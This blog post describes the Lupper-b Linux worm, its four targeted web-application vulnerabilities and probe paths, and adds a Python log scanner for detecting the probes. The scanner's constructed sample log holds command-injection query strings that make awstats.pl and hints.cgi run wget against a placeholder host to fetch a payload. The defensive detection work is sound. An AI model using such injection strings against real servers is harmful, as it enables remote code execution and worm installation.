Linux “Lupper-b” Worm
Recently a number of remotely exploitable vulnerabilities in web applications that commonly run on Linux have been widely abused by remote attackers. I see a lot of vulnerability probes against machines directly connected to the Internet; the most common are probes for the AWStats and XML-RPC vulnerabilities.
This week I noticed a variation of these probes that indicated something new was afoot. After a bit of googling the actual wget request used in the probe, I discovered that a new version of the “Lupper” Linux worm is on the loose. “Lupper-b”, as it is called, uses a quartet of remotely exploitable vulnerabilities to install itself on host systems.
The four vulnerabilities are in the AWStats, XML-RPC, Webhints and Includer applications. The worm itself carries a proxy server and a backdoor shell listening on UDP port 7222, and I have also seen mention of an IRC bot being included in some cases.
Interestingly enough, while googling the attack string looking for information I also turned up a vulnerable server or two (or 50, who’s counting?). All in all it’s a fairly slick worm, in that it combines several exploits in one package with a UDP backdoor shell.
The paths to the vulnerable applications, as listed in the Computer Associates writeup, are as follows:
“Trying to exploit the AWStats vulnerability, the worm attempts to submit its commands to the awstats.pl script at the following locations:
/cgi-bin/awstats.pl
/scgi-bin/awstats.pl
/awstats/awstats.pl
/cgi-bin/awstats/awstats.pl
/scgi-bin/awstats/awstats.pl
/cgi/awstats/awstats.pl
/scgi/awstats/awstats.pl
/scripts/awstats.pl
/cgi-bin/awstats/awstats.pl
/scgi-bin/awstats/awstats.pl
/cgi-bin/stats/awstats.pl
/scgi-bin/stats/awstats.pl
/stats/awstats.pl
Trying to exploit the XML-RPC vulnerability, the worm attempts to submit its commands to the following scripts:
/xmlrpc.php
/xmlrpc/xmlrpc.php
/xmlsrv/xmlrpc.php
/blog/xmlrpc.php
/drupal/xmlrpc.php
/community/xmlrpc.php
/blogs/xmlrpc.php
/blogs/xmlsrv/xmlrpc.php
/blog/xmlsrv/xmlrpc.php
/blogtest/xmlsrv/xmlrpc.php
/b2/xmlsrv/xmlrpc.php
/b2evo/xmlsrv/xmlrpc.php
/wordpress/xmlrpc.php
/phpgroupware/xmlrpc.php
Trying to exploit the Webhints vulnerability, the worm attempts to submit its commands to the following scripts:
/hints.pl
/cgi/hints.pl
/scgi/hints.pl
/cgi-bin/hints.pl
/scgi-bin/hints.pl
/hints/hints.pl
/cgi-bin/hints/hints.pl
/scgi-bin/hints/hints.pl
/webhints/hints.pl
/cgi-bin/webhints/hints.pl
/scgi-bin/webhints/hints.pl
/hints.cgi
/cgi/hints.cgi
/scgi/hints.cgi
/cgi-bin/hints.cgi
/scgi-bin/hints.cgi
/hints/hints.cgi
/cgi-bin/hints/hints.cgi
/scgi-bin/hints/hints.cgi
/webhints/hints.cgi
/cgi-bin/webhints/hints.cgi
/scgi-bin/webhints/hints.cgi
Trying to exploit the Includer vulnerability, the worm attempts to submit its commands to the following scripts:
/cgi-bin/includer.cgi
/scgi-bin/includer.cgi
/includer.cgi
/cgi-bin/include/includer.cgi
/scgi-bin/include/includer.cgi
/cgi-bin/inc/includer.cgi
/scgi-bin/inc/includer.cgi
/cgi-local/includer.cgi
/scgi-local/includer.cgi
/cgi/includer.cgi
/scgi/includer.cgi”
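As an added example (not part of the original post or of the CA writeup), here is a Python script that takes the path lists above and runs them over Apache combined-format access log lines. It flags any request against one of the probe targets, notes whether the decoded query string carries the wget fetch these probes use to pull the worm down, and picks out source addresses that walked more than one of the four lists, which is the worm's "quartet" behaviour rather than a lone scanner. The Webhints and Includer sets are generated from their prefixes to keep the block short; they are identical to the lists above. The log lines embedded in the script are constructed for the example, and the IP addresses, payload URL and query parameters in them are placeholders, not captured worm traffic.

```python
import re
from urllib.parse import unquote, urlsplit

# Probe targets from the CA writeup quoted above, keyed by the vulnerable application.
# Webhints and Includer are built from prefix lists; the results equal the quoted lists.
_HINTS_PREFIXES = ["", "/cgi", "/scgi", "/cgi-bin", "/scgi-bin", "/hints",
                   "/cgi-bin/hints", "/scgi-bin/hints", "/webhints",
                   "/cgi-bin/webhints", "/scgi-bin/webhints"]
_INCLUDER_PREFIXES = ["", "/cgi-bin", "/scgi-bin", "/cgi-bin/include", "/scgi-bin/include",
                      "/cgi-bin/inc", "/scgi-bin/inc", "/cgi-local", "/scgi-local",
                      "/cgi", "/scgi"]

PROBE_PATHS = {
    "awstats": {
        "/cgi-bin/awstats.pl", "/scgi-bin/awstats.pl", "/awstats/awstats.pl",
        "/cgi-bin/awstats/awstats.pl", "/scgi-bin/awstats/awstats.pl",
        "/cgi/awstats/awstats.pl", "/scgi/awstats/awstats.pl", "/scripts/awstats.pl",
        "/cgi-bin/stats/awstats.pl", "/scgi-bin/stats/awstats.pl", "/stats/awstats.pl",
    },
    "xmlrpc": {
        "/xmlrpc.php", "/xmlrpc/xmlrpc.php", "/xmlsrv/xmlrpc.php", "/blog/xmlrpc.php",
        "/drupal/xmlrpc.php", "/community/xmlrpc.php", "/blogs/xmlrpc.php",
        "/blogs/xmlsrv/xmlrpc.php", "/blog/xmlsrv/xmlrpc.php", "/blogtest/xmlsrv/xmlrpc.php",
        "/b2/xmlsrv/xmlrpc.php", "/b2evo/xmlsrv/xmlrpc.php", "/wordpress/xmlrpc.php",
        "/phpgroupware/xmlrpc.php",
    },
    "webhints": {p + "/" + n for p in _HINTS_PREFIXES for n in ("hints.pl", "hints.cgi")},
    "includer": {p + "/includer.cgi" for p in _INCLUDER_PREFIXES},
}

# Apache "combined" log format: ip ident user [time] "METHOD target PROTO" status size ...
_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: [^"]*)?" (?P<status>\d{3}) '
)

# Constructed sample log (placeholder addresses, payload URL and parameters; not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Nov/2005:03:14:07 +0000] "GET /cgi-bin/awstats.pl?configdir=%7cecho%20%3bwget%20http%3a%2f%2f198.51.100.9%2fpayload%3b%7c HTTP/1.0" 404 290 "-" "Mozilla/4.0"
203.0.113.7 - - [10/Nov/2005:03:14:08 +0000] "POST /blog/xmlrpc.php HTTP/1.0" 200 1102 "-" "Mozilla/4.0"
198.51.100.23 - - [10/Nov/2005:03:15:02 +0000] "GET /index.html HTTP/1.1" 200 4410 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Nov/2005:03:14:09 +0000] "GET /cgi-bin/hints/hints.cgi?%7cwget%20http%3a%2f%2f198.51.100.9%2fpayload%7c HTTP/1.0" 404 290 "-" "Mozilla/4.0"
198.51.100.23 - - [10/Nov/2005:03:16:11 +0000] "GET /cgi-bin/awstats.pl.bak HTTP/1.1" 404 290 "-" "Mozilla/5.0"
"""


def match_family(path):
    """Return the vulnerability family whose probe list contains `path`, else None.
    The path is percent-decoded and duplicate slashes collapsed first, so that
    /cgi%2Dbin/awstats.pl or //xmlrpc.php cannot slip past an exact-string match."""
    path = re.sub(r"/+", "/", unquote(path))
    for family, paths in PROBE_PATHS.items():
        if path in paths:
            return family
    return None


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not parse."""
    m = _LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    return {"ip": m.group("ip"), "method": m.group("method"), "path": parts.path,
            "query": unquote(parts.query), "status": int(m.group("status"))}


def scan(lines):
    """Return the parsed records whose path is one of the worm's probe targets.
    Each hit carries the matched family and whether the decoded query mentions
    wget, which is how these probes fetch the worm onto the victim."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        family = match_family(rec["path"])
        if family is None:
            continue
        rec["family"] = family
        rec["wget"] = "wget" in rec["query"].lower()
        hits.append(rec)
    return hits


def multi_family_sources(hits, minimum=2):
    """IPs that probed `minimum` or more of the four families. One source walking
    several lists in one pass is the worm's signature, not a stray misconfigured client."""
    by_ip = {}
    for h in hits:
        by_ip.setdefault(h["ip"], set()).add(h["family"])
    return {ip for ip, fams in by_ip.items() if len(fams) >= minimum}


if __name__ == "__main__":
    found = scan(SAMPLE_LOG.splitlines())
    for h in found:
        print(f'{h["ip"]} {h["method"]} {h["path"]} -> {h["family"]} '
              f'status={h["status"]} wget={h["wget"]}')
    print("multi-family sources:", multi_family_sources(found))
```

Two caveats when running this over real logs. The access log only records the request line, so for XML-RPC, where the exploit rides in the POST body, a hit on xmlrpc.php tells you the script was targeted but not what was sent; a 404 on a path you never served is harmless, while a 200 on one of these paths from a source that also walked the other lists deserves a look at the host itself, starting with whether anything unexpected is listening on UDP port 7222. To feed it your own log, replace `SAMPLE_LOG.splitlines()` with the lines of the file.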
A full writeup on the worm is available from Computer Associates; be sure to follow the links on the specific vulnerabilities so you get the full gist of the attack vector.